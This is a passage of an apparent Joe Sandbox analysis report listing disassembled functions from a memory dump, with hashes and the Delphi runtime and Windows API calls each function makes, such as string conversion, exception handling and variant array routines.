                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unicode$System@$System@@$String$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Copy$qqrx20Stringii$Asg$qqrr20EnsureLen$qqrx20String$qqrr20Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 878542493-0
                                                                                                  • Opcode ID: 3ab3b303093b8a636e88502fb4d09674c64ae5bfa68a04d5878e1d884443bb8e
                                                                                                  • Instruction ID: a5e6bedc7b1fa09ac2a89fd4f76479da9ae694add23f0eb23cd9a90cd4e19f31
                                                                                                  • Opcode Fuzzy Hash: 3ab3b303093b8a636e88502fb4d09674c64ae5bfa68a04d5878e1d884443bb8e
                                                                                                  • Instruction Fuzzy Hash: 76516E34A04185DBDF11DFA8DD82EADB3F9EF85220B6082A6D500D7295EBB0DEC5D781
                                                                                                  Function 50010280 Relevance: 21.2, APIs: 14, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010450,?,?,?,?), ref: 500102B1
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500102CE
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 50010306
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 50010337
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000001,500108D0,00000000,50010450,?,?,?,?), ref: 5001033C
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010392
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010397
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010450,?,?,?,?), ref: 500103B4
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E1
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 500103E6
                                                                                                  • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 5001041C
                                                                                                  • @System@@RaiseExcept$qqrv.RTL120(00000000,50010468,00000000,50010450,?,?,?,?), ref: 50010421
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$StringSystem@@$Unicode$AnsiExcept$qqrvException@$bctr$qqrp20FromRaiseRecpx14RecxiStr$qqrr20Stringx27System@%Sysutils@T$us$i0$%$Internal$Asg$qqrr20Stringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2110080293-0
                                                                                                  • Opcode ID: 2acdd1ed6b19c18f9c3d6a13469d4a30c81e8413c8df2a859eca72d6a4b32dc1
                                                                                                  • Instruction ID: 3dd440310b7d6b838b62487898f5154655aa6721fdb6a91f51f28f113b154d74
                                                                                                  • Opcode Fuzzy Hash: 2acdd1ed6b19c18f9c3d6a13469d4a30c81e8413c8df2a859eca72d6a4b32dc1
                                                                                                  • Instruction Fuzzy Hash: 62517F30E012969FEB10CFA4ED81AAEB7F8EF18304F504266E940E7251D7B59E81CB91
                                                                                                  Function 50031250 Relevance: 21.1, APIs: 14, Instructions: 139COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031275
                                                                                                  • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 500312E9
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500312EE
                                                                                                  • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 50031305
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000001,?,?,00000001,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 5003130A
                                                                                                  • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 5003133E
                                                                                                  • @Variants@VarArrayCreateError$qqrv.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031349
                                                                                                  • @Variants@@VarClear$qqrr8TVarData.RTL120(?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB,?), ref: 50031354
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 500313BB
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB), ref: 500313C0
                                                                                                  • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 500313D4
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(00000000,?,?,?,?,?,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530), ref: 500313D9
                                                                                                  • VariantCopy.OLEAUT32(?,00000000), ref: 50031409
                                                                                                  • @Variants@VarResultCheck$qqrl.RTL120(?,00000000,?,00000000,00000000,?,500314BF,?,?,00000000,00000000,50031530,?,?,500311AB,500311BB), ref: 5003140E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Variants@$ArrayCheck$qqrlResult$Safe$BoundCreateIndex$Clear$qqrr8CopyDataError$qqrvVariantVariants@@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2462754632-0
                                                                                                  • Opcode ID: d2226f6f942347185893c2112448d7c493ef7b5df07ef858df8a6411db5986f1
                                                                                                  • Instruction ID: 68a44697431ba9d170457ca7a9e020540fd923d0265e6cf9d388f6b8b8de95fb
                                                                                                  • Opcode Fuzzy Hash: d2226f6f942347185893c2112448d7c493ef7b5df07ef858df8a6411db5986f1
                                                                                                  • Instruction Fuzzy Hash: E951EF759026599FCB16DB98DC91BD9B3FCAF5C200F0442E6F509E7202D6709F858FA1
                                                                                                  Function 500262D0 Relevance: 21.1, APIs: 14, Instructions: 113COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,5002647C), ref: 50026303
                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026327
                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 50026342
                                                                                                  • @Sysutils@AnsiStrRScan$qqrpbb.RTL120(?,?,00000105), ref: 50026366
                                                                                                  • @Sysutils@StrLCopy$qqrpbpxbui.RTL120(?,?,00000105), ref: 5002637B
                                                                                                  • @System@@IsClass$qqrp14System@TObjectp17System@TMetaClass.RTL120(?,?,00000105), ref: 50026392
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000105), ref: 5002639E
                                                                                                  • @Sysutils@StrLen$qqrpxb.RTL120(?,?,00000105), ref: 500263A7
                                                                                                  • @System@FindResourceHInstance$qqrui.RTL120(0000FFD6,?,00000100,?,?,00000105), ref: 500263D7
                                                                                                  • LoadStringW.USER32(00000000,0000FFD6,?,00000100), ref: 500263DD
                                                                                                  • @System@TObject@ClassName$qqrv.RTL120(?,?,00000105), ref: 500263EA
                                                                                                  • @Sysutils@StrLFmt$qqrpbuit1px14System@TVarRecxi.RTL120(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 50026454
                                                                                                  • @Sysutils@StrLen$qqrpxb.RTL120(?,?,?,?,?,?,?,?,?,?,?,?,00000105), ref: 5002645C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Sysutils@$ClassFileLen$qqrpxbModuleNameStringSystem@@$AnsiChar$qqrx20Class$qqrp14Copy$qqrpbpxbuiFindFmt$qqrpbuit1px14Instance$qqruiLoadMetaName$qqrvObject@Objectp17QueryRecxiResourceScan$qqrpbbUnicodeVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 3883136372-0
                                                                                                  • Opcode ID: 26642bce504ab1d5de481313da31769c506bee54e9e21774b4cd9cd9320994c5
                                                                                                  • Instruction ID: 811c3105ae2c2e25737f7d5603747125e796c38313662228b4ee9a41d4d60d20
                                                                                                  • Opcode Fuzzy Hash: 26642bce504ab1d5de481313da31769c506bee54e9e21774b4cd9cd9320994c5
                                                                                                  • Instruction Fuzzy Hash: C3416170A026989FEB20DFA4DC81BCEB7F9AB58300F4045E6E548E7241D7759E94CF90
                                                                                                  Function 5000AC14 Relevance: 19.7, APIs: 13, Instructions: 178COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000ADF2), ref: 5000AC77
                                                                                                    • Part of subcall function 500089C4: @System@@LStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120 ref: 500089C9
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000ADF2), ref: 5000ACC4
                                                                                                  • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5000ADF2), ref: 5000ACD0
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000ADF2), ref: 5000ACED
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,00000000,5000ADF2), ref: 5000AD05
                                                                                                  • @System@@LStrSetLength$qqrv.RTL120(?,?,00000000,5000ADF2), ref: 5000AD1D
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(?,?,00000000,5000ADF2), ref: 5000AD41
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,?,00000000,5000ADF2), ref: 5000AD69
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,?,?,00000000,5000ADF2), ref: 5000AD8D
                                                                                                  • @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,00000000,?,?,00000000,5000ADF2), ref: 5000AD95
                                                                                                  • @System@UniqueString$qqrr27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000ADF2), ref: 5000ADA6
                                                                                                  • @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000ADF2), ref: 5000ADC2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: StringSystem@System@@$Unicode$AnsiSystem@%$From$InternalT$us$i0$%$Str$qqrr27StringusT$us$i0$%x20$Str$qqrr20Stringx27$Char$qqrx20$Asg$qqrr20Char$qqrx27Length$qqrvString$qqrr27Stringx20Unique
                                                                                                  • String ID:
                                                                                                  • API String ID: 3676940474-0
                                                                                                  • Opcode ID: bb095718089ea6be8f972c8c7ef42ee5cb20509a0965c4a480db5d170545e9f0
                                                                                                  • Instruction ID: ac500fde1abb86cd177b816adb830af5aaa922a19d54f23eb4e0e9c860ba2dc2
                                                                                                  • Opcode Fuzzy Hash: bb095718089ea6be8f972c8c7ef42ee5cb20509a0965c4a480db5d170545e9f0
                                                                                                  • Instruction Fuzzy Hash: BA51AE30A011A58FFF11DFB8D8A0AAEB3F5BF82200B918276E501DB654DB74DD41CB41
                                                                                                  Function 5001EC6C Relevance: 19.6, APIs: 13, Instructions: 147COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ECC4
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ECF1
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?,00000000,5001EDFA), ref: 5001ED1A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ED3C
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001EDFA), ref: 5001ED60
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EDFA), ref: 5001ED6A
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EDFA), ref: 5001ED87
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,?,00000000,5001EDFA), ref: 5001EDAB
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxirx24Sysutils@TFormatSettings.RTL120(?,?,?,?,00000000,5001EDFA), ref: 5001EDB6
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EDFA), ref: 5001EDCC
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5001EDFA), ref: 5001EDDF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$From$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$FormatInternalSysutils@$Buf$qqrpbuipxvuipx14Length$qqrr20Recxirx24SettingsStringi$Asg$qqrr20CharChar$qqrx20Len$qqrr20StringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 1571066770-0
                                                                                                  • Opcode ID: 64cdb319a3e332e6adb68e29035f8a23bacc852be664f48c6a3ab591bbd3c75b
                                                                                                  • Instruction ID: cf008f4841a0b878aeaef547bb5394bc45d7c61c31ed61ef41548ca3eb0479a1
                                                                                                  • Opcode Fuzzy Hash: 64cdb319a3e332e6adb68e29035f8a23bacc852be664f48c6a3ab591bbd3c75b
                                                                                                  • Instruction Fuzzy Hash: 9E514B74B00199EFDB10DFA8DD8199EB7F9EF58200B6046A6E904E7355D730EE81DB90
                                                                                                  Function 5001EAD4 Relevance: 19.6, APIs: 13, Instructions: 143COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB2C
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB59
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EB7E
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBA0
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBC4
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBCE
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EBEB
                                                                                                  • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC0B
                                                                                                  • @Sysutils@FormatBuf$qqrpbuipxvuipx14System@TVarRecxi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC16
                                                                                                  • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,?,?,00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC2C
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,5001EC5A,?,50018744,5000DDB4,00000001), ref: 5001EC3F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$System@@$String$From$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Buf$qqrpbuipxvuipx14FormatLength$qqrr20RecxiStringiSysutils@$Asg$qqrr20CharChar$qqrx20Len$qqrr20StringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2011730137-0
                                                                                                  • Opcode ID: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                  • Instruction ID: 905ef9e5a7d310ec851db8a729e0b9c5fd371b18d59da8299c39f15f331ca2da
                                                                                                  • Opcode Fuzzy Hash: e0ec65ee7119bda094fea1574f5fbe587e7ff05964032da46d515081ca9c0199
                                                                                                  • Instruction Fuzzy Hash: 03515C70A05199EFDB00DFA8DD8199EB7F9FF88200B6046A6E905E7355D730EE81DB90
                                                                                                  Function 5001671C Relevance: 19.6, APIs: 13, Instructions: 136COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                  • @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                  • @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                  • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                  • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
